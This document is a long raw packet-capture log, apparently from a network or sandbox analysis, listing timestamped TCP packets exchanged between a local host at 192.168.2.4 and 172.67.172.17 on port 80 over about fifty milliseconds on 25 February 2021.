                                                                                                              Feb 25, 2021 15:10:28.951461077 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.951497078 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.952267885 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.952306986 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.952332020 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.952352047 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.952354908 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.952374935 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.952390909 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.952418089 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.952434063 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.952445984 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.952466011 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.952476025 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.952487946 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.952491045 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.952524900 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.952527046 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.952543020 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.953074932 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.953094959 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.953123093 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.953125954 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.953167915 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.953943014 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.953960896 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.953982115 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.954005003 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.954754114 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.954777002 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.954803944 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.954803944 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.954854012 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.955595970 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.955621958 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.955647945 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.955698967 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.956420898 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.956438065 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.956459045 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.956557035 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.957302094 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.957319975 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.957334995 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.957429886 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.958141088 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.958169937 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.958195925 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.958242893 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.958364010 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.958736897 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.958772898 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.958806992 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.958839893 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.958843946 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.958899021 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.959580898 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.959609032 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.959706068 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.959961891 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.959984064 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.960004091 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.960025072 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.960062027 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.960091114 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.960880041 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.960928917 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.960957050 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.960979939 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.961008072 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.961054087 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.961659908 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.961718082 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.961740017 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.961777925 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.961780071 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.961857080 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.962677002 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.962718010 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.962781906 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.962840080 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.962843895 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.962909937 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.963386059 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.963506937 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.963593960 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.963627100 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.963665962 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.963706970 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.964200020 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.964230061 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.964291096 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.964293003 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.964348078 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.964920998 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.965013027 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.965042114 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.965089083 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.965109110 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.965125084 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.965845108 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.965873957 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.965907097 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.965914965 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.965950966 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.965962887 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.965998888 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.966727972 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.966764927 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.966799974 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.966834068 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.966837883 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.966890097 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.967513084 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.967561960 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.967592955 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.967628002 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.967637062 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.967688084 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.968439102 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.968482018 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.968538046 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.968547106 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.968597889 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.969095945 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.969192982 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.969249964 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.969284058 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.969338894 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.969363928 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.969449043 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.970012903 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.970051050 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.970084906 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.970118046 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.970125914 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.970159054 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.970835924 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.970904112 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.970938921 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.970973015 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.970985889 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.971029997 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.971756935 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.971797943 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.971839905 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.971858978 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.971882105 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.971935987 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.974741936 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.974765062 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.974781036 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.974807978 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.974850893 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.974898100 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.977109909 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.977138996 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.977185965 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.977200031 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.977226973 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.977284908 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.979263067 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.979289055 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.979321003 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.979347944 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.979356050 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.979407072 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.980278015 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.980305910 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.980329990 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.980350018 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.980360985 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.980422974 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.981213093 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.981240988 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.981266975 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.981280088 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.981292963 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.981723070 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.981791973 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.981825113 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.981857061 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.981889009 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.981903076 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.981936932 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.984277964 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.984316111 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.984354019 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.984386921 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.984428883 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.984611034 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.985939026 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.985980988 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.986012936 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.986025095 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.986043930 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.986092091 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.986274004 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.986320019 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.986358881 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.986362934 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.986397028 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.986447096 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.987072945 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.987108946 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.987140894 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.987168074 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.987190962 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.987237930 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.987901926 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.987981081 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.988024950 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.988039970 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.988078117 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.988123894 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.988719940 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.988763094 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.988810062 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.988821030 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.988857985 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.988890886 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.988908052 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.989578962 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.989614964 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.989639997 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.989655018 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.989679098 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.989686012 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.990361929 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.990411043 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.990417004 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.990462065 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.990503073 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.990503073 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.991193056 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.991234064 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.991257906 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.991269112 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.991292000 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.991343975 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.992000103 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.992031097 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.992067099 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.992095947 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.992096901 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.992114067 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.992760897 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.992810965 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.992822886 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.992837906 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.992909908 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.992913961 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.993582010 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.993619919 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.993644953 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.993688107 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.993721962 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.993741035 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.994371891 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.994398117 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.994430065 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.994451046 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.994519949 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.994560957 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.995276928 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.995299101 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.995338917 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.995353937 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.995356083 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.995388985 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.995913982 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.995933056 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.995954037 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.995975971 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.995985031 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.996009111 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.996776104 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.996834040 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.996840000 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.996875048 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.996916056 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.996968985 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.997546911 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.997596025 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.997612953 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.997643948 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.997695923 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.997756958 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.998404026 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.998437881 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.998487949 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.998497009 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.998527050 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.998583078 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.998611927 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.998658895 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.999254942 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.999289036 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.999341965 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.999355078 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.999389887 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.999438047 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:28.999501944 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.000284910 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.000333071 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.000341892 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.000360966 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.000396013 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.000406981 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.000427008 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.000474930 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.001167059 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.001188040 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.001214027 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.001230001 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.001243114 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.001259089 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.001266956 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.002104044 CET8049728172.67.172.17192.168.2.4
